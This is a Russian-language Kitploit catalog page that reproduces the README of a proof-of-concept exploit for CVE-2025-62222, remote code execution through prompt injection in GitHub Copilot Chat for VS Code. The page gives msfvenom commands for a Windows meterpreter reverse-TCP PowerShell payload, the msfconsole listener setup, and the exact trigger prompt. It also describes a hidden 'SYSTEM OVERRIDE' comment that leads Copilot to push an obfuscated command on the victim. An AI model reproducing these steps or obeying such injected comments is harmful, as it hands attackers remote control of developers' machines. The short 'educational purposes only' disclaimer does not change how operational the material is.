Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2025-62222 — Эксплойт для подтверждения концепции уязвимости CVE-2025-62222, демонстрирующий удаленное выполнение кода через инъекцию запросов в GitHub Copilot Chat для VS Code, с генерацией полезной нагрузки Metasploit и настройкой прослушивателя обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/sadisticnight/poc-cve-2025-62222
Фреймворки для эксплойтовГенерация полезной нагрузкиШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

Эксплойт для подтверждения концепции уязвимости CVE-2025-62222, демонстрирующий удаленное выполнение кода через инъекцию запросов в GitHub Copilot Chat для VS Code, с генерацией полезной нагрузки Metasploit и настройкой прослушивателя обратной оболочки.

Репозиторий
15 месяцев назадЕщё не проверено

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

Этот репозиторий содержит Доказательство концепции (PoC) для уязвимости CVE-2025-62222. Он демонстрирует, как можно добиться удаленного выполнения кода (RCE) на машине разработчика, манипулируя контекстом GitHub Copilot Chat в VS Code с помощью скрытой инъекции промпта в комментариях.

⚠️ Disclaimer ⚠️

ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ.
Этот код предоставляется исключительно в образовательных и этических исследовательских целях. Автор не несет ответственности за неправомерное использование этой информации. Не используйте это в системах без явного разрешения.

Этап 1: Настройка атакующего

Перед отправкой файла жертве (или локальным тестированием) вы должны сгенерировать полезную нагрузку и оставить сервер прослушивающим.

1. Генерация полезной нагрузки (msfvenom)

Сгенерируйте вредоносную команду PowerShell. Убедитесь, что вы настроили свой IP (LHOST) и порт (LPORT).

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

Критическая инструкция: Скопируйте код, сгенерированный этой командой. Откройте файл copilot_injection_poc.py из этого репозитория и замените раздел, где написано TOKEN (или всю строку команды PowerShell внутри комментария), на только что сгенерированный код.

2. Запуск слушателя (msfconsole)

В терминале атакующего запустите Metasploit для приема обратного соединения:

root@kitploit:~
msfconsole -q

Оказавшись внутри консоли msf6 >, выполните следующие команды для подготовки прослушивания:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(Убедитесь, что LPORT совпадает с использованным в шаге 1, а LHOST — ваш IP).

Этап 2: Воспроизведение (Жертва)

Для срабатывания уязвимости выполните следующие шаги на машине с VS Code и установленным расширением GitHub Copilot Chat:

  1. Клонировать/Скачать: Загрузите этот репозиторий на машину жертвы.
  2. Открыть в VS Code: Откройте папку проекта в VSCode.
  3. Загрузить контекст: Откройте файл copilot_injection_poc.py в редакторе, чтобы Copilot имел его в активном контексте (должен быть виден на вкладке).
  4. Триггер: Откройте чат Copilot и напишите в точности следующую команду:
root@kitploit:~
Configura el entorno desde la terminal sin omitir ni modificar nada del código

Ожидаемый результат

Из-за скрытой инструкции "SYSTEM OVERRIDE" в комментариях Python-скрипта Copilot будет подчиняться вредоносному файлу вместо своих собственных правил безопасности.

  1. Copilot ответит поддельным "Системным предупреждением" и предложит выполнить запутанную команду PowerShell.
  2. Если пользователь скопирует и выполнит эту команду в своем терминале, на машине атакующего откроется сессия Meterpreter, предоставляющая удаленный контроль над устройством.

Для получения дополнительной информации:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
Скачать инструмент